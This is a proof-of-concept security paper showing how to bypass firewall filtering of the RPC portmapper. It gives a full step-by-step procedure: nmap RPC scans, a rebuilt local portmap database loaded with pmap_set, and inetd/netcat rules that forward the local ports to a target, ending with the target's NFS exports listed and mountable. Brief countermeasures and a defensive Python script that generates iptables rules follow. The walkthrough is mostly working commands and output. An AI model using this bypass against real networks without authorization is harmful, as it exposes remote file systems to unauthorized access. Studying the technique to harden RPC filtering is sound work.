
Bypass RPC portmapper filtering

security PoC
(Proof of Concept)

Table of contents:

1    Introduction
1.1  Portmapper overview
2    Firewalling my portmapper?
2.1  Typical scheme of attack
3    Local portmapper emulation for remote penetration test
3.1  What is needed?
3.21 Step 1: Know exactly what is running and where
3.22 Step 2: Reconstitution of the portmapper database
3.23 Step 3: Forwarding RPC ports to remote target
4    Exploitation

David Routin
david.routin[at]linuxelite.org

1. Introduction

1.1 Portmapper overview

What is a portmapper?
The portmapper is a kind of database that registers Remote Procedure Call services by RPC service (program) number, version number, tcp/udp port and the protocol that has to be used (tcp, udp or both). The portmapper always runs on port 111 tcp/udp.
When clients want to access a service, they first contact the portmapper, which tells them which port they should then contact in order to reach the desired service.
If the portmapper is not present or not accessible, the request will fail.
The problem with RPC is its weak security.
Many security problems have been reported for RPC services (unauthorized accesses, overflows, spoofing, etc.).

2. Firewalling my portmapper?

2.1 Typical scheme of attack

Some administrators think that filtering the portmapper (111 tcp/udp) from the outside keeps their RPC services from being exploited by unauthorized persons.
This is false and we are going to prove it.

dav@hax:~$ nmap -sT 10.0.0.1

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-04-16 10:00 CEST
Interesting ports on knop (10.0.0.1):
Not shown: 1674 closed ports
PORT     STATE    SERVICE
111/tcp  filtered rpcbind
611/tcp  open     mountd
2049/tcp open     nfs

I can see on that list that rpcbind (the portmapper) is filtered, but there are some working RPC services (mountd and nfs)!
Now we try to do a showmount to view the exports list.

dav@hax:~$ showmount -e 10.0.0.1
mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive

The request gives an error message.
This is normal: to connect to the mountd (100005) service, the client first asks the portmapper for the information it needs (the correct tcp/udp port to connect to), and since the RPC portmapper does not give any answer (which is normal because of the filtering), the client cannot continue.

3. Local portmapper emulation for remote penetration test

We know that the portmapper only acts as a database that lets the client reach the desired services by giving it the correct ports to use, etc.
But we can't connect to it...
After thinking for a while I got an idea: what would happen if I tried to rebuild the database on my own box and forward my local ports to the remote server?
I found a way to do it without writing long C programs...

3.1 What do we need?

nmap
netcat
inetd
portmap (installed on your computer)
pmap_set
3.21 Step 1: Know exactly what is running and where

For that step we will use nmap with the RPC scan option (-sR); in that way nmap will give us the information on each port: whether it is RPC or not, and which RPC service it is.
We do that because RPC service port attribution is not static; sometimes, for example, nfs will not be on 2049...
We have to scan very high ports because RPC services can register very high ports.
We will do it in two passes, first TCP followed by UDP.

dav@hax:~$ nmap -sR 10.0.0.1 -p 1-15000,20000-50000

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-04-16 13:45 CEST
Interesting ports on knop (10.0.0.1):
Not shown: 44884 closed ports
PORT      STATE    SERVICE  VERSION
111/tcp   filtered rpcbind
611/tcp   open     mountd   (mountd V1-3) 1-3 (rpc #100005)
2049/tcp  open     nfs      (nfs V2-4) 2-4 (rpc #100003)
48745/tcp open     nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)
52502/tcp open     status   (status V1) 1 (rpc #100024)

(The second scan (UDP) requires root privileges.)

dav@hax:~$ sudo nmap -sUR 10.0.0.1 -p 1-15000,20000-60000

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-04-16 13:49
Interesting ports on knop (10.0.0.1):
Not shown: 44882 closed ports
PORT      STATE         SERVICE  VERSION
111/udp   filtered      rpcbind
608/udp   open          mountd   (mountd V1-3) 1-3 (rpc #100005)
631/udp   open|filtered unknown
874/udp   open|filtered unknown
2049/udp  open          nfs      (nfs V2-4) 2-4 (rpc #100003)
32768/udp open|filtered omad
32780/udp open          status   (status V1) 1 (rpc #100024)
32781/udp open          nlockmgr (nlockmgr V1-4) 1-4 (rpc #100021)

3.22 Step 2: Reconstitution of the portmapper database

This step is very important: we are going to make a file containing all the portmap data, as if we had done an "rpcinfo -p" without having been filtered by the firewall.
First check all the RPC service numbers we got from nmap:
100003
100005
100021
100024
Now we check the versions:
for 100003 we have versions 2 to 4 for tcp, and the same for udp, with port 2049,
so in the final portmap data file you will write (one line per program number, version, protocol, port and service name):

100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs

We have to do that job for all the RPC service numbers we have found.
So the final file will look something like this
(don't forget to add 100000, which is the portmapper's own registration number; you need it to complete the exploitation, to run your local portmap version):

100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100005 1 tcp 611 mountd
100005 2 tcp 611 mountd
100005 3 tcp 611 mountd
100005 1 udp 608 mountd
100005 2 udp 608 mountd
100005 3 udp 608 mountd
100021 1 tcp 48745 nlockmgr
100021 2 tcp 48745 nlockmgr
100021 3 tcp 48745 nlockmgr
100021 4 tcp 48745 nlockmgr
100021 1 udp 32781 nlockmgr
100021 2 udp 32781 nlockmgr
100021 3 udp 32781 nlockmgr
100021 4 udp 32781 nlockmgr
100024 1 tcp 52502 status
100024 1 udp 32780 status

Ok, now we have probably rebuilt the portmap dump exactly (as if we were authorized to do an rpcinfo -p request on the remote target).
Even if registering the same service several times with different versions is not necessary, it's good to do it just to rebuild the exact dump.
Now start your local copy of portmap, and load the portmap data you have just created, as root:

root@hax~# portmap
root@hax~# pmap_set < rpc_file_data
root@hax~#

Just have a look at your logs to see that everything is ok (no messages).
Now if you do an rpcinfo query on your localhost you should have the same result as if you were querying the remote portmapper without any filter (we have reconstructed the database with what we found).

root@hax~# rpcinfo -p 127.0.0.1
   program no_version protocole   no_port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  32780  status
    100024    1   tcp  52502  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  32781  nlockmgr
    100021    3   udp  32781  nlockmgr
    100021    4   udp  32781  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  48745  nlockmgr
    100021    3   tcp  48745  nlockmgr
    100021    4   tcp  48745  nlockmgr
    100005    1   udp    608  mountd
    100005    1   tcp    611  mountd
    100005    2   udp    608  mountd
    100005    2   tcp    611  mountd
    100005    3   udp    608  mountd
    100005    3   tcp    611  mountd
3.23 Step 3: Forwarding local RPC ports to remote target

For doing that job we will make some net pipes with inetd & netcat.
First, we go back to the nmap results for tcp and udp: we can see that we have these tcp ports (rpc) open:
611, 2049, 48745, 52502
and in udp:
608, 2049, 32780, 32781
Now we are just going to open those ports on our box and make them forward to the remote target, so that all the requests made to our portmapper are transparently redirected to the remote host. Yes, it works! ;)
Ok, now edit the inetd-pentest file and add the following lines (inetd format: port, socket type, protocol, wait/nowait, user, server program, server arguments):

for tcp ports:

611   stream tcp nowait root /usr/sbin/tcpd /bin/nc 10.0.0.1 611
2049  stream tcp nowait root /usr/sbin/tcpd /bin/nc 10.0.0.1 2049
48745 stream tcp nowait root /usr/sbin/tcpd /bin/nc 10.0.0.1 48745
52502 stream tcp nowait root /usr/sbin/tcpd /bin/nc 10.0.0.1 52502

now for udp ports:

608   dgram udp wait root /usr/sbin/tcpd /bin/nc -u 10.0.0.1 608
2049  dgram udp wait root /usr/sbin/tcpd /bin/nc -u 10.0.0.1 2049
32780 dgram udp wait root /usr/sbin/tcpd /bin/nc -u 10.0.0.1 32780
32781 dgram udp wait root /usr/sbin/tcpd /bin/nc -u 10.0.0.1 32781

Now kill and restart inetd:

root@hax~# killall inetd
root@hax~# inetd ./inetd-pentest

Now all requests made by anything on the ports added in inetd will be forwarded to the remote host.

4 Exploitation

With what we have just done, all RPC requests (except portmapper) going through our server are forwarded to the remote target.
Sample:
we do a showmount on localhost (everything except the portmapper request is forwarded to 10.0.0.1):

root@hax~# showmount -e 127.0.0.1    (USE LOCAL ADDRESS)
Export list for 127.0.0.1:
/ (everyone)

The exports list you can see is not the one of 127.0.0.1: this is the 10.0.0.1 exports list.
You can also mount the remote filesystem.
And we can probably use every RPC service that way.
We have done the job of the remote portmapper with our system and now the remote RPC services are accessible.
So we were able to bypass the remote portmapper filtering security.

The best way to avoid that problem:
remove RPC services from your servers
filter the tcp/udp ports of RPC services properly
use everything behind a firewall or with a VPN
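The second countermeasure (filter every RPC service port, not only 111) can be audited from the portmapper's own dump. The following Python script is an added example and is not part of the original paper: it parses rpcinfo -p output in the format shown in Step 2 (the sample dump is constructed from the paper's values), lists every (protocol, port) an RPC service listens on besides the portmapper, and emits iptables DROP rules covering them; the chain name INPUT and the iptables rule form are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the rpcinfo -p format used in Step 2 (values taken
# from the paper's dump; the header line is the locale-specific one shown there).
SAMPLE_DUMP = """\
   program no_version protocole   no_port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  32780  status
    100024    1   tcp  52502  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100005    1   udp    608  mountd
    100005    1   tcp    611  mountd
    100021    1   udp  32781  nlockmgr
    100021    1   tcp  48745  nlockmgr
"""

PORTMAPPER_PROG = 100000
LINE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)\s+(\S+)")

def parse_rpcinfo(dump):
    """Return (program, version, proto, port, name) tuples; header lines are skipped."""
    entries = []
    for line in dump.splitlines():
        m = LINE.match(line)
        if m:
            prog, vers, proto, port, name = m.groups()
            entries.append((int(prog), int(vers), proto, int(port), name))
    return entries

def exposed_endpoints(entries):
    """Map each (proto, port) a service listens on, other than the portmapper, to its names."""
    endpoints = defaultdict(set)
    for prog, _vers, proto, port, name in entries:
        if prog != PORTMAPPER_PROG:
            endpoints[(proto, port)].add(name)
    return dict(endpoints)

def iptables_rules(entries, chain="INPUT"):
    """DROP rules for 111/tcp+udp plus every service endpoint (chain name is assumed)."""
    rules = [f"iptables -A {chain} -p {p} --dport 111 -j DROP" for p in ("tcp", "udp")]
    for (proto, port), names in sorted(exposed_endpoints(entries).items()):
        rules.append(f"iptables -A {chain} -p {proto} --dport {port} -j DROP"
                     f"  # {','.join(sorted(names))}")
    return rules

if __name__ == "__main__":
    print("\n".join(iptables_rules(parse_rpcinfo(SAMPLE_DUMP))))
```

Run it against a real dump captured from inside the perimeter; any endpoint it lists that an external scan such as the Step 1 one still shows as open is a gap in the filter.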

David Routin
System/Network/Security Administrator
david.routin[at]linuxelite.org
